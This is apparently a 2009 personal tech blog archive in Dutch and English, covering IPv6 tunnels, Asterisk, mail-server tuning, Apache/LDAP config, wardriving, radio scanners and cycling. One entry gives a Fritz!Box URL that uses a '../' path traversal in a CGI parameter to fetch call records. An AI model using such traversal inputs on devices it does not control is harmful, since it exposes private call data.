Ik wilde zelf een trackback maken binnen de blog van de hcc!pc netwerkgroep maar ondanks de e-mail over de trackback of de bevestiging van een reactie kwam er niks in de reacties (tabel serendipity_comments). Nergens een foutmelding te vinden. Ik had zoiets van 'vroeger werkte het wel vanaf idefix'.. en bedacht me dat het misschien een probleem was met trackbacks en comments vanaf IPv6 adressen. Een kleine websearch later leverde bevestiging op: s9y: IPv6 (Bugs) • Serendipity. Met een simpel psql statement:

ALTER TABLE serendipity_comments ALTER COLUMN ip type varchar(64);

Is het probleem uit de wereld en kan ik ook vanaf ipv6 clients comments achterlaten en trackbacks maken.

De zoveelste phishing mail vandaag, maar een van de vragen die de phisher stelt aan de gebruiker viel me op als een bijzondere vorm van krom Nederlands, vermoedelijk afkomstig uit een automatische vertaler. Ik raak bijna benieuwd naar de originele bewoordingen hiervan:

Duur van de e-mail wanneer er sprake is zeker:

Maar of alle phishers gebruiken dezelfde originele teksten en vertaler, of ergens is een website waar adviezen en standaard-teksten aan phishers verkocht worden en staat deze tekst als geschikt voor Nederlandstalig.

Wardriving results 11-18 May: 338 new networks with GPS locations. No spectacular results, just almost daily wardriving on the bicycle commute.

A while ago Twitter was so broken for me it showed a plain error message, not even a fail whale:

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Temporarily Unavailable error was encountered while trying to use an ErrorDocument to handle the request.

Double fail!

Issue at work today: our mailserver was a bit overloaded. We run spamassassin in daemon mode to filter incoming mail that made it past the simple smtp checks. I noticed that mail to all staff members caused lots of waiting spamc processes from time to time which made mail pile up. A lot of the spamc processes were killed after a while because maildrop limits the time mail delivery can take. The big fix will be to increase the memory on the mail server, it is now swapping a lot. But the small fix was to tune spamd to not try to kill all its child processes when idle. Starting and stopping spamd child processes is an 'expensive' operation and mails to all staff members trigger a lot of simultaneous spamc calls, so it works better if a mail to a lot of local users finds already running spamd servers. I changed the setting to --max-spare=5 which made the load problem go away. We will still get a memory upgrade, but this simple processing fix also helped.

Wardriving results 26 April - 10 May: 4605 new networks with GPS locations at WiGLE. A few bicycle rides were planned around parts of Utrecht including a visit to previously uncharted parts of De Meern.

De supermarkt op de Uithof heeft 'mtn dew' wat de nieuwe naam blijkt te zijn voor 'Mountain Dew' wat ik wel eens in de verenigde staten of canada heb gedronken. Het blijkt de amerikaanse versie te zijn geimporteerd en gestickerd door American Food Service. Zo amerikaans dat ze bij de kassa van de supermarkt niet eens de scanner gebruiken maar gelijk een code intikken.

A first (for me): phishing mail (still from ADMIN at helpdesk.org) which has a web-link to 're-validate your mailbox' which points to a form at emailmeform.com. By the description of the service they will mail it to the form owner, but that owner can be a dropbox like for any phishing mail, just a bit harder to trace. The form asks for username, password and e-mail address.
Update: the phishers will have to do better, emailmeform has blocked the form and the account fast.

I run an irc server for a very small irc network, and in the past I tried to ipv6-enable it, but failed and let it at that mainly because that was in the hurry of trying to migrate services. Today, with all the ipv6 news from the ripe conference in mind I gave it a go again.

I use ircd-hybrid 7.2.2 (ubuntu package) which should support ipv6. But I never configured the IP to listen on, which makes it default to 0.0.0.0, v4-only. The fix was to define two IP addresses and ports:

listen {
	host = "1.2.3.4";
	port = 6667;
	host = "fe80::525f:c4ca";
	port = 6667;
}

Now the irc server is both ipv4 and ipv6 reachable, and updated in the dns. My client irssi needed an option /set resolve_prefer_ipv6 ON to actually use it, but now I have it working. One more service converted!

It seems the painters of the building were either very sloppy or aspiring vandals, they painted over the window right in front of my webcam on 7 April 2009. So I moved the webcam a bit.

The new scanner has been found: a Commtel COM225 scanner, which has a range from 25 MHz to 1300 Mhz and good scanning and receiving capabilities. A nice secondhand one, found via Marktplaats. Now I am programming lots of frequencies including Schiphol airport frequencies and other airport and eurocontrol frequencies. Commtel COM225 review at strongsignals.net.

An end to the continuing tale of the windows domain controller behind a firewall which I mentioned twice before. Finally I can log in with a reasonable speed. Kerberos over UDP (88/udp) was failing and I could not find out why because test traffic to port 88/udp made it. Peering long and hard at the wireshark dump I saw UDP fragmentation happening, but those fragments did not show up at the server. Another google search found How to force Kerberos to use TCP instead of UDP in Windows with the right registry key to force the client to use TCP, which fixed it. Finally.

I have been looking for a better radio scanner recently. For the amount of use it will get and what I want a second hand one is probably best. I also noticed the new ones on sale at the moment in the Netherlands are quite limited.
There are the simple ones with 50-100 channels which don't have the militairy air communications band that I want, and no 'tuning' option (tuning up and down the dial when looking for signals in a certain area).
Those are sometimes sold as 'church radio' in the Netherlands because somewhere in the years the rescue services moved to encrypted speech (C2000), frequencies 148.0125 to 149.0875 MHz and 153.0125 to 153.6875 MHz were opened especially for 'church radio': transmitting a church service (and nothing else). Most scanners will support this range. I really don't think the 'target audience' of church radio, people who want to hear a church service but are unable to go to church, usually elderly or sick people will be able to deal with all the little knobs and dials on the average radio scanner. I looked at the designs for church radio via Internet 'receivers' and those have a volume control and an on-off switch. The very advanced model has a 'channel' selector for choosing a church or gospel music.
The higher-end radio scanners sold new are really high-end with alphanumeric channel descriptions and trunk-tracking options. A bit too much for what I want, and too expensive.
So I'm browsing the secondhand scanner ads on a few websites. And everytime I see an offer that looks nice I look up the details of the offered scanner on the scanner reviews on the Strong Signals site which is a very good resource for finding out the options of scanners and comparing them.
I hope to find one for a reasonable price. In browsing the ads I learned about brands I haven't heard of before. There is Commtel which is actually from Uniden and GRE, making some Commtel models near copies of Uniden Bearcat models. There is also Realistic which seems to be the other name for Radio Shack scanners. Icom also makes receiver / scanners but those are out of my price range.

Wardriving results 7 - 25 April: 5152 new networks with GPS locations. The tour in another part of the country (near Arnhem) helped for almost half of that.

Interesting article The Great Brazilian Sat-Hack Crackdown in Wired on-line today. UHF-Satcom.com audio samples has some interesting samples of pirates using these frequencies and other interesting stuff (such as space shuttle audio). Time to dig up my radio scanner and see what I can find on these frequencies as listed at UHF Satellite reception - UHF-Satcom.
Update nothing, as this is outside the range of my trusty old Uniden Bearcat UBC120XLT, ranges 66-88, 108-174 and 406-512 MHz. Maybe time to find something better.

Good opinion article by The Register on the stance of UK police on cameras pointing their way: Police, Cameras, Inaction! - The Register with a great conclusion:

If the issue is not addressed soon – as the systemic problem we suspect it is - then the Police will only have themselves to blame for a massive loss of public belief in their integrity.

A good article with a readable view on what is going wrong with the police in England.

I did it: we now use Asterisk as home 'pbx'. I bought an OpenVox dual ISDN card via Novavox. Great company, Novavox: when it would take about a week to deliver the card they got in touch to make sure I could wait that long.

The choice for dual ISDN was because I still want to keep the outside line via KPN isdn: we are also using budgetphone but it was quite easy to find a phone number that was unreachable via budgetphone but reachable via KPN. And I want to keep using an ISDN set. So one port of the isdn card is configured as 'TE' card (terminal equipment) connected to KPN and one is configured as 'NT' card (network terminator) connected to the ISDN set. Asterisk does all the heavy lifting: outgoing call routing depending on number called and time of day. Incoming call routing, reacting to callerid and advanced answering machine.

Just in CNN (US edition) breaking news e-mail:

-- Ashton Kutcher is first to reach 1 million followers in Twitter contest with CNN.

I guess Twitter is now mainstream enough to generate its own breaking news. Ashton Kutcher first to reach 1 million in Twitter battle with CNN - CNN Technology which explains it: CNN news is big news for CNN.

Spring in the garden: the birds are quite busy and eat lots of seeds. My guess is they are more hungry now (time to build their nests) than in winter time. Everything is green and coming alive. Yesterday evening I could sit outside for a while.

Pasen: tijd voor het paastreffen van de nederlandse vereniging voor human powered vehicles, in het dagelijks gebruik beter bekend als de ligfietsers. Dit jaar ook weer op camping de Harskamperdennen in Harskamp.

Vrijdag er heen met een groepje uit Utrecht van de u-liggers, een leuke rit bij aangenaam weer.

Zaterdag ben ik zelf er op uit gegaan om mijn wardrive score bij te stellen door vanaf een andere plek dan gewoon te gaan fietsen. Het werd een fietstocht Harskamp, Otterlo, een stukje Arnhem, Wolfheeze en een puntje van Ede en weer terug. Nieuwe netwerken gevonden: 2640 (op 3021 totaal, bijzonder hoge verhouding voor wardriven). Net voor Ede brak de binnenkabel van de achterderailleur van mijn fiets, dus toen was de focus op terugkomen. Doordat de derailleur terugschoot zat ik achter in de hoogste versnelling en moest ik mijn kleinste voorblad kiezen om nog een beetje weg te kunnen rijden. Bij de fietsenmaker in Harskamp gestopt, die had nieuwe binnenkabels voor Shimano. Op de camping de nieuwe kabel er in gezet en toen bleek ook dat de buitenkabel aan het verslijten is. We kregen de binnenkabel er niet door. We, want als je in dit gezelschap aan je fiets gaat sleutelen heb je binnen de kortste keren hulp met goeie inzichten. Uiteindelijk zat het probleem in de laatste centimeters buitenkabel en die hebben we afgeknipt. Het geheel past nogsteeds en ik schakel nu weer stukken lichter. Maar die buitenkabel mag dus ook wel eens vervangen worden. Met mijn rijstijl slijt er toch van alles aan zo'n fiets.

Het programma voor Zondag was niet de traditionele toertocht maar een puzzeltocht in groepjes. Iedereen in een groep laten fietsen was bij het aantal inschrijvingen verkeerstechnisch niet meer handig. Maarten had een hele leuke puzzeltocht samengesteld die we met een groepje van 10 personen prima uit konden voeren. Ik had de accu van de wardrive box aan de lader gehad dus die ging voor de aardigheid ook weer mee. Heel wat vragen van mede-ligfietsers mogen beantwoorden over wat die antenne was achterop de fiets. Voor degenen die het nog nalezen: 629 nieuwe netwerken gevonden, 837 in totaal, en dat voor een rit grotendeels door open velden. Een kaartje met de route en de gevonden netwerken.

Maandag weer opruimen en afbreken en terug naar huis. Ook prima fietsweer, niet te warm.

I was looking for scriptable ways to download the call records from a fritz!box. It took some hacking, but I found it, just go to http://fritz.box/cgi-bin/webcm?getpage=../html/de/FRITZ!Box_Anrufliste.csv for the list in a usable .csv format. Works for the 5012 and 7170.

Again the UK police show their worth by being more involved in the cause of the death of Ian Tomlinson than first reported: Video reveals G20 police assault on man who died - guardian.co.uk

Free ups test! It seems the power company decided not to deliver at all for 9 minutes. Interesting is that they don't mention a failure on their own website.

Good Piled Higher & Deeper Comic today:
If TV Science was more like REAL Science Just remember it is TV science. I'll save the rant about police wanting investigating powers like those on TV for a later time.

Wardriving results 14 March - 6 April: 4066 new networks with GPS locations. Still at 16 in the WiGLE stats.

Vandaag "project fiets" uitgevoerd: we zijn van huis naar Brunssum gefietst met onze ligfietsen: totaal 182 kilometer. Iets meer dan 20 kilometer per uur gemiddeld volgens de tellers. Een hele dag fietsen dus. Het voelt erg goed om het een keer gedaan te hebben. Morgen terug.. per trein. Onderweg zijn we natuurlijk ingehaald door de nodige racefietsers (koersers?) maar die hebben allemaal fietsen die ik met een hand kan optillen, dus die mogen harder. Het weer werkte redelijk mee: droog, niet teveel zon, wind meestal in een redelijke hoek. Vooral langs de Zuid-Willemsvaart was een rechte lijn doorfietsen, dat schiet behoorlijk op.

Commentaar Here's proof. The innocent do have something to fear / Simon Jenkins - The Guardian (engelstalig) over een kwestie waarin MP (Member of Parliament, vergelijkbaar met een kamerlid) Jacqui Smith die altijd erg voor het verzamelen van gegevens over burgers is, met natuurlijk het bekende argument dat mensen die niet schuldig zijn niets te verbergen hebben. Toen declaraties door Jacqui Smith onderzocht werden dook een rekening op voor 5 pay-per-view films, waarvan 2 porno films. Mooi commentaar: Hoe vaak zal Jacqui Smith niet te horen gekregen hebben dat een of andere 'oplossing' voor data-opslag door de overheid 'totaal veilig' zou zijn.
Ik kan haast niet wachten tot een Nederlandse politicus die altijd roept over bewaarplicht een vergelijkbare actie uithaalt.

I got curious about querying 'pagerank' and found a nice php source: Finding Google PageRank of a website using PHP. So I duplicated that for my own amusement: Google PageRank checker. Works like a charm.

I found this funny in a dvb service scan in Utrecht:

0x0000 0x0072: pmt_pid 0x0474 Digitenne -- Geen service (running, scrambled)

Translation: Geen service = no service. But it is running and scrambled. It is the old slot of 'BemBem' kids radio which seems to have stopped.

From time to time it annoyed me that the double-click selection in XTerm/UXTerm on the Ubuntu desktop differed from what I was used to before: 1 click is a letter, 2 clicks is a word, 3 clicks is a line. The definition of 'word' seemed to differ a lot with mine, I want to be able to select parts separated by @ and : characters. Inspired by xterm Regex Matching for Cut Selection by Sean ReifschneiderI tried with 'regex' but that did not work as I wanted, because extending a selection fails unexpectedly in that mode. Solution: updating the definition of a 'word' by modifying the XTerm*charClass. My current settings:

XTerm*on4Clicks: line
XTerm*on3Clicks: regex [^	 \n]+
XTerm*on2Clicks: word
XTerm*charClass:

That's a tab in the regex: now I can use triple-click to select a url, e-mail address or something likewise all at once, and double-click selects a word in the way I like it. Duplicated for class UXTerm.

Lesson learned today: certain dell rackmount servers signal loss of power in one power supply by running the cooling fans at maximum speed. The power supply in the most unreachable corner of the rack. And finding the source of the noise is hard when you have a rack full of them ("Somewhere in the area of adonis..").
And here I was looking for the airflow obstruction I created when changing some kvm cables.

With IPv6 I have enough address space to select a 'nicer looking' address on outgoing connections from home server greenblatt. The assigned endpoint, 2001:888:10:11::2 resolves to tunnel17.ipv6.xs4all.nl which is an ok name, but something of my own is better. So, I have set up /etc/network/interfaces to add another address of my own and use this as source in outgoing traffic:

iface xs4allipv6 inet6 v4tunnel
    endpoint 194.109.5.241
    address 2001:888:10:11::2
    netmask 64
    up ip tunnel change xs4allipv6 ttl 64
    up ip -6 addr add 2001:888:1011::13/128 dev xs4allipv6
    up ip -6 route add unreachable 2001:888:1011::/48
    up ip -6 route add default via 2001:888:10:11::1 src 2001:888:1011::13
    down ip -6 route del unreachable 2001:888:1011::/48

I add the address I prefer, 2001:888:1011::13 with such a netmask that it doesn't clash with the fact that address is part of the range on the wired network at home and I add a default route using that as source. 2001:888:1011::13 resolves to outgate.idefix.net

This works... except when I visit addresses in the xs4all IPv6 IP space (my best guess: in the same /32). This must be an artifact of the IPv6 source address selection policy, but I can't find the way to manipulate this policy. It seems to be related to Linux 2.6.recent.
Update : I learned from Jeroen Schot that the address selection is an implementation of RFC 3484, explaned in RFC 3484 on Linux by Ulrich Drepper. The destination address choice is configured in /etc/gai.conf, for as far as I can see gai.conf is mostly destination selection, the source is a kernel matter.
Update 2009-11-18 : Solution found: working IPv6 source address selection the way I want it.

Neat: a webbot via ipv6!
2001:da8:7007:100:20f:1fff:fe6d:c250 - - [29/Mar/2009:12:33:08 +0200] "GET /robots.txt HTTP/1.1" 200 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
Doesn't really identify itself as a bot but it requests pages at such a rate that it must be an automated script.

Just seen in the Slashdot RSS feed.. An advertisment which does not look that relevant to slashdot or to the story Graphic Artists Condemn UK Ban On Erotic Comics : Dating for seniors
I'm not going to make the joke about carbon dating.

I noticed a few malformed characters in the RSS feed of my homepage that weren't there in the original database entries and showed ok in the web version. Again, utf-8 problems showing, although all data (postgres - script - xml - browser) should be utf-8. Lots of testing and searching, finally I found The Perl UTF-8 and utf8 Encoding Mess by Jeremy Zawodny. He is right: it is a mess. And the post itself demonstrates it by being filled with � characters.
So to make sure everything in the RSS generating process understand that what comes out of PostgreSQL is valid utf-8 and should be imported in the XML::RSS module as the same valid utf-8, I need to recode it to utf-8. Uh.. ok. The bit of code:

        my $body = Encode::decode('UTF-8', $row[1]);

And now I can use ÜTF-8 çħáräćtërs!

I had trouble reaching the other end of my Hurricane Electric IPv6 tunnel so I mailed the support address telling them about the issue I saw in routing. Within minutes I had a reply that an engineer was looking into the matter and that it would be up and running again within an hour.

Lots of paid Internet services will take longer to acknowledge and fix a problem. Kudos to Hurricane Electric for offering IPv6 connectivity for free with such a high level of support.

The tale of Trying to set up a windows domain controller behind a firewall continues: the server at the receiving side runs Windows server 2008 and has a whole new idea of dynamic port numbers for RPC services. Although it is documented as port numbers for 'outgoing connections' in The default dynamic port range for TCP/IP has changed in Windows Vista and in Windows Server 2008, we see them used and negotiated for incoming connections. An explanation is in this technet article: Dynamic Client Ports in Windows Server 2008 and Windows Vista (or: How I learned to stop worrying and love the IANA) although I would call the use of the term 'client ports' confusing because processes are be listening on those ports. From that server:

  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49158          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49163          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49164          0.0.0.0:0              LISTENING

So the Microsoft documentation is broken. No thanks for that.
Update: A somewhat better explanation at How to configure a firewall for domains and trusts where indeed the entire range 49152 - 65535 range can be used for RPC and should be configured in the firewall.

I like my home server usually boring and stable, but virus prevention should be at the bleeding edge, especially when it handles mail for multiple domains where other people can receive it. So I don't like messages in the clamav logfile:

WARNING: Your ClamAV installation is OUTDATED!
WARNING: Local version: 0.92.1 Recommended version: 0.95

Using the Ubuntu backports I was able to get a less older version of clamav running. I updated the home server greenblatt documentation with the exact details of just using the clamav backport and no other backports.

'Internetgebruiker moet beter beschermd worden' - nu.nl/Internet met een voorstel:

De Europese Commissie moet snel met wetgeving komen om internetgebruikers beter te beschermen. Nieuwe wetgeving moet aantasting van de persoonlijke levenssfeer door bedrijven en overheden tegengaan.

Mijn voorstel: ga eens praten met de mensen in het Europese parlement die over de bewaarplicht gaan, een serieuze aantasting van de persoonlijke levenssfeer door overheden.

Lots of unreadable news about the Conficker/Downadup worm, including the first 'end of the Internet predicted' articles. For a quite readable explanation, go read Downad/Conficker, who’s the April Fool? by Rik Ferguson from Trend Micro and for a more scientific dissection go read An Analysis of Conficker by Phillip Porras, Hassen Saidi, and Vinod Yegneswaran at SRI International.
Source: Final countdown to Conficker 'activation' begins - The Register.

Apache the webserver can be configured to use multiple authentication servers to find the one that knows a given user. We needed this for our new subversion server and it took me some searching to find the right way to configure it. It is one of those 'easy when you know it' items. We want our new subversion server to allow all our normal (ldap) users access and a set of guest users. There will always be guest users for projects hosted with us. The relevant part of the Apache documentation Authentication, Authorization and Access Control - Apache HTTP server isn't very clear on using multiple authentication sources but Apache Module mod_authn_alias shows that it is possible and a nice way to make readable authentication configurations using multiple sources. The AuthnProviderAlias needs to be in the global configuration so I created /etc/apache2/conf.d/authconfig with:

# the general authorization config

<AuthnProviderAlias dbm svnlocal>
    AuthDBMUserFile /etc/apache2/subversion/guestusers
    AuthDBMType DB
</AuthnProviderAlias>

<AuthnProviderAlias ldap svnldap>
    AuthLDAPURL ldap://ldap.cs.uu.nl:389/dc=cs,dc=uu,dc=nl?uid
</AuthnProviderAlias>

And now to use these for SVN access:

# the subversion access config
<Location /repos>
    DAV svn
    SVNParentPath /data/svn/repos

    # our access control policy
    AuthzSVNAccessFile /etc/apache2/subversion/svnaccessfile

    # try anonymous access first, resort to real
    # authentication if necessary
    Satisfy Any
    Require valid-user

    # how to authenticate a user
    AuthType Basic
    AuthName "Subversion repository"

    AuthBasicProvider svnlocal svnldap
</Location>

The Satisfy Any is because we do have repositories with full public access. The choice of first checking local users and then checking ldap users is because the number of local users should be limited and the ldap server should not be overloaded with traffic. The complete access rules are set up in the AuthzSVNAccessFile which is documented in the SVN book, httpd, the Apache HTTP Server - Server Configuration SVN

Pub is closed by Monty Python grenade - Evening Standard You can't make this stuff up: a 'suspicious object' turned out to be the original Holy Hand Grenade of Antioch from the Monty Python movie Monty Python and the Holy Grail (1975).
Via Holy Hand Grenade of Antioch Bomb Scare - Schneier on Security.

Van de volkskrant site, een video over de Land Rover Defender:

Als ik dat zo zie blijf ik er bij dat de Land Rover Discovery meer mijn keuze zou zijn als ik er veel geld voor beschikbaar had en te maken had met het soort weg en terrein waar zo'n soort auto zin heeft. Voor de aardigheid, een promotievideo voor de Landrover Discovery er bij:

The Virtual Bookcase is back online too, and mail is flowing again for all the domains. Lots of typing, checking and everything to move the stuff to the home server. But, finished (I think).
Update: and all the web statistics are working again and updated. Finished?

I took the old powersupply from v4.idefix.net outside and opened it there. In that order, because of the smell. Maybe capacitor problems have been involved in the untimely end of this power supply too. Anyway, that one is not going to work anymore!

The old powersupply

The old powersupply, details of the damage on the inside

The good news after all the work to get my homepage reachable again is of course:

koos@greenblatt:~$ host idefix.net
idefix.net has address 82.95.196.202
idefix.net has IPv6 address 2001:888:1011::694
idefix.net mail is handled by 10 postbox.idefix.net.

My homepage is now reachable over IPv6!

And it is back! Idefix 4 broke in a major way: the power supply let out the magic smoke in a big way: the hosting company called me to let me know the server was smelling funny and did not want to start up at all. Since the end of idefix 4 in a rack was near anyway the decision was made to move the server home. There I used another power supply to get access to my data again. The old powersupply was a 300 Watt powersupply which seems to be way underrated for a dual Xeon system. My best guess is that the instability the system had came from the powersupply anyway. So, time to move more domains home. Content from idefix.net is now here at home and virtualbookcase will be next when I find time. I had started migrating Camp Wireless so I finished that migration fast. Mail is diverted to a different place so I have a bit of time to configure all the mailing lists and other things.

Wardriving results 5 February - 13 March: 2692 new networks with GPS locations. Not much wardriving happening in this time due to holidays and busy times.

Jason Scott writes about the end of the Computer shopper magazine. One thing he notes are the big listings of BBS numbers in the small classified ads. An amazing amount of BBS history and related information is hidden in those ads.

Computer Shopper, December 1987, BBS ads

Computer Shopper, December 1987, BBS ads detail

One sample:

(714)688-3204 Riverside. Baud:
3/12/24, online: 24hrs. (disk
space = 160mb) SysOp: Richard
Adkins. ATARI ONLY BBS. For
Supporting Atari-St and Atari
8 bit computers.

Ah, back when the world was divided into Atari, Amiga, Commodore 64 and other camps. Interesting is that the phone number (714)688-3204 shows up in searches with different bbs names: "The Widowmaker" (December 1991), "R.A.C.E. BBS" (undated), "Starlink Line 1" (September 1991), "Starlink" (August 1992).

Trying to set up a windows domain controller behind a firewall we run into a weird error message:

DNS was successfully queried for the service location (SRV) resource
record used to locate a domain controller for domain
zandbak.students.cs.uu.nl:


The query was for the SRV record for
_ldap._tcp.dc._msdcs.zandbak.students.cs.uu.nl
  
The following domain controllers were identified by the query: 
  
BROADCAST.zandbak.students.cs.uu.nl

Common causes of this error include:
  
- Host (A) records that map the name of the domain controller to its IP
addresses are missing or contain incorrect addresses.

- Domain controllers registered in DNS are not connected to the network
or are not running.

Query successful and these are the common sources of this error. What?
Anyway, after some searching I dig out wireshark to look what is happening. And the query SRV? _ldap._tcp.dc._msdcs.zandbak.students.cs.uu.nl. and answer is followed by traffic to port 389/udp. Right. Anyway, the hopefully correct firewall setup is documented by Microsoft: How to configure Windows Server 2003 SP1 firewall for a Domain Controller.
Again, one of the cases where the actual error and the reported error message differ.

I got interested in the Collectors' Net, a network of people interested in old telephone equipment, who at one time got the idea of hooking them together using asterisk and voip links. I don't have any old telephone equipment to make available to the C*net members, but I do have some Asterisk projects for them to enjoy. So, I signed up and programmed my asterisk to route calls to the 0149- area code (A reserved area code in the Netherlands) out via C*Net after some massaging (C*Net uses enum to link the asterisk servers directly).

Some long-planned garden work today: I pruned the apple tree. Having the tree almost lose branches under the weight of the apples last year and having part of the apples hanging way to high made me decide to seriously prune it before spring really starts. Quite some work. I hope the tree will do better this year. And we have a bigger load of firewood now. I hope this summer will have some evenings to deal with the previous load of firewood.

Oh and in Paris I did bring my laptop and the dvb-t stick. Tried a scan, and found 5 bouquets with in total 29 services (18 free-to-air). Some services with 'HD' in the name, which mplayer could not play. I also saw some multilingual services. Free-to-air services seen by w_scan: Canal 21(Multi-7), IDF1(Multi-7), NRJ Paris(Multi-7), CAP 24(Multi-7), M6(MULTI4), W9(MULTI4), NT1(MULTI4), PARIS PREMIERE(MULTI4), ARTE HD(Multi 4), CANAL+(CNH), TPS STAR(CNH), CANAL+ SPORT(CNH), TF1 HD(MR5), France 2 HD(MR5), M6HD(MR5), TF1(SMR6), NRJ12(SMR6), TMC(SMR6).

I updated my homepage so it automatically incorporates my tweets. I notice I use different styles on twitter and here, probably having a lot to do with the 140 character limit at Twitter, but in the end it can be mixed anyway.

I'm in Paris at the Alcatel-Lucent Enterprise Forum. Lots of presentations about the future of IP telephony, how to save money with IP telephony in the current financial climate and lots of future visions involving UC (Unified Communications). Even realistic ones where people want to look at the organization first before deciding wheather UC is a good idea to spend money on.
Last year I was at the 2008 edition and an analyst told that TDM (digital intracompany telephony) had no future left. This year it isn't even mentioned anymore. IP telephony is the future and there is a move from proprietary protocols to SIP. One standard, pick the SIP PBX that does best what you want and pick the SIP phones that do what you want. For standard features (calling and being called) any standard SIP phone is good enough.
The conference center has wireless network for the forum guests with limited access: only port 80 and 443 seem to work. Good thing xs4all runs sshd on port 80 on the shell servers so I can still get somewhere and use my screens. My tip now for Internet access for road-warriors: bring a 2 meter UTP cable too. Wifi may be everywhere, but our hotel (Hotel California in Paris, makes me wonder how hard it will be to leave) offers free Internet access when you bring your own utp cable.

I'm typing this while sitting in the Thalys high-speed train between Antwerp and Brussels (so no 300 km/h yet). The first class has free wi-fi Internet access. I had to lower the mtu of the wireless interface to be able to use ssh and screen to access my normal home environment, so path mtu discovery is probably b0rken somewhere. I appear from a Belgian IP, no idea how they do the uplink from the train.
Update 2009-03-06: Found on the Thalys website: WiFi - Internet access for everyone! with an explanation how satellite Internet and UMTS/GPRS are used to tunnel the Internet to the train. The whole tunneling thing is probably what is causing the mtu problem.

I made my own lolcat: Tender was sleeping on the couch near the laptop charger. I first tried to setup a picture but she was annoyed at my attempts to put the cable near her but 5 minutes later she went to sleep again. Recharging: 95% complete.

Back from a week in ... Egypt. A gift from Mirjam's parents. We saw Cairo, the pyramids, El Fayoum and Alexandria. It's an amazing feeling to visit 5000 year old man-made constructions. At the same time Egypt now is a very chaotic country with noise everywhere. For the first time I found Dutch traffic calm compared to what I had seen. Especially in Alexandria you constantly hear car horns.

Lots of security theatre ofcourse, but seeing 3 man militairy police (Koninklijke Marrechaussee) on Schiphol airport with automatic weapons was more shocking than seeing truckloads of police and soldiers with automatic weapons in Egypt. I sort-of expect it in Egypt (although the travel brochures downplay it a bit). The Egyptian 'tourist police' is everywhere and most places where tourists come are guarded. Metal detectors everywhere beeping but most of the time the beeping is ignored by the guards.

I could have done with less adventure: first one of our bags went missing on the flight to Egypt. Nothing really important in the bag but irritating. Then on Sunday evening we went walking in Cairo and found a police cordon in the area we wanted to visit. We had dinner in a restaurant near the cordon but it had moved a few streets back when we left the restaurant so all the international press was gathered and tried to get a statement from the obviously European tourists leaving the area. But we had no idea at that time what happened. Some of the group asked the reporters what happened and got a bit of idea: a bomb attack. Friends back in the Netherlands alerted us to the fact that we were on TV tuesday morning. I looked quite lost, which was exactly what I felt like at that time. And only when we arrived home and browsed the newspapers we noticed that an airplane had crashed near Schiphol during the week.

I got reminded of my Alcatel stats again and some google searches and some combining of clues (the logical place would be in the 'td call' command) led me to the right answer at DMTv7 für Speedtouch 516 536 546 585 608 706 716 780 to get the dsl linestats from a Speedtouch 546/546i: :td call cmd="tdsl getData all". Trying it:

*              ____/
*
------------------------------------------------------------------------
=>:td call cmd="tdsl getData all"

=====================DISCLAIMER======================
 Access to expert commands is intended for qualified 
 personnel only.                                     
==================END=OF=DISCLAIMER==================

Vendor Information
   phyType=2  phyMjVerNum=4  phyMnVerNum=0 
   phyVerStr=B2pBT004.d15b 
   drvMjVerNum=14  drvMnVerNum=20482 
   drvVerStr=15b 

And suddenly lots of data including the signal/noise ratio per carrier. So after stopping gathering Alcatel Speedtouch graphs in 2005 because I switched to a Speedtouch 546i I can now gather the stats again and create the graphs daily. In the mean time gnuplot changed a bit but with some tweaking of the plotscript I now have the first S/N graph of the 546i as I want it.

Vandaag zou het geen fietsweer worden dus was ik maar begonnen aan een project waar de onderdelen al even voor klaar lagen: de binnenbanden en buitenbanden van mijn ligfiets vernieuwen en de ketting schoonmaken. De buitenbanden hadden toch al naar schatting 7000 kilometer afgelegd, dus een keer vervangen was wel nuttig. Op de Nazca Pioneer zaten al Schwalbe Marathon banden, die zijn prima bevallen en dus heb ik weer gekozen voor deze banden. De overweging was nog even of de Marathon plus een keuze was, deze is nog lekbestendiger, maar de afweging extra lekbestendigheid versus rolweerstand kwam toch uit op 'niet meer rolweerstand'. Bij het er op leggen van banden heb ik altijd wat moeite om ze ervan te overtuigen dat 'rond' de ideale vorm is, meestal blijven er toch lichte hobbels achter ondanks duwen en trekken. Deze keer heb ik de methode 'gelijk terdege oppompen' geprobeerd en ergens bij 6 bar schoten zowel voor- als achterband in de goede ronde vorm. Maximum voor deze banden is 7 bar en daar ben ik voor gegaan.
Daarnaast heb ik de ketting eens schoongemaakt. Doordat ik de afgelopen tijd een paar keer door de regen had gefietst en niet direct de ketting schoongemaakt was deze nogal gaan roesten wat de snelheid ook niet ten goede kwam. De ketting heeft een nacht in een badje diesel gelegen en daarmee is de nodige rommel er uit gekomen. Ik heb nu ook de truukjes van de sluitschakel geleerd. Ik kan nu dus weer een pot vooruit, op volle snelheid.
Update 2009-02-16: Ja het werkt, gemiddelde snelheid naar mijn werk vanmorgen 23.94 kilometer per uur.

It being Friday afternoon I fired up vlc to see if there were any interesting announcements of multicast streams. And yet another university, this time one in the UK was leaking their entire TV program lineup (all UK terrestrial programs, which is quite a list). I tried the programs but nothing worked until I tried the last one: BBC HD. This one does work, giving over 20 megabit of video in HD. Screenshot of the BBC HD logo animation (1600x1080px)

After the attack I saw on an asterisk server which was most likely scanning for valid user accounts to use in international dialing I am wondering if I can 'play' with users who try to abuse an asterisk setup.

For the hcc!pc gg netwerkgroep demo asterisk I scripted a sort of teaser for users trying to dial abroad:

[internationaltrick]
; not really dial an international number: play an interesting 'wrong number'

exten => _00XXXXXXXXXX.,1,Wait(5)
exten => _00XXXXXXXXXX.,n,Goto(wrongnumber,s,1)

The delay is to add confusion to how many digits it accepts (although someone using 'early dialing' could see when asterisk reports back it has seen enough digits). What the wrongnumber routine does is play a random 'wrong number' recording taken from Telephone world - International sounds & recordings so someone who tries this who is actually listening to call progress might think he is on to something and spend hours trying to find the right way.

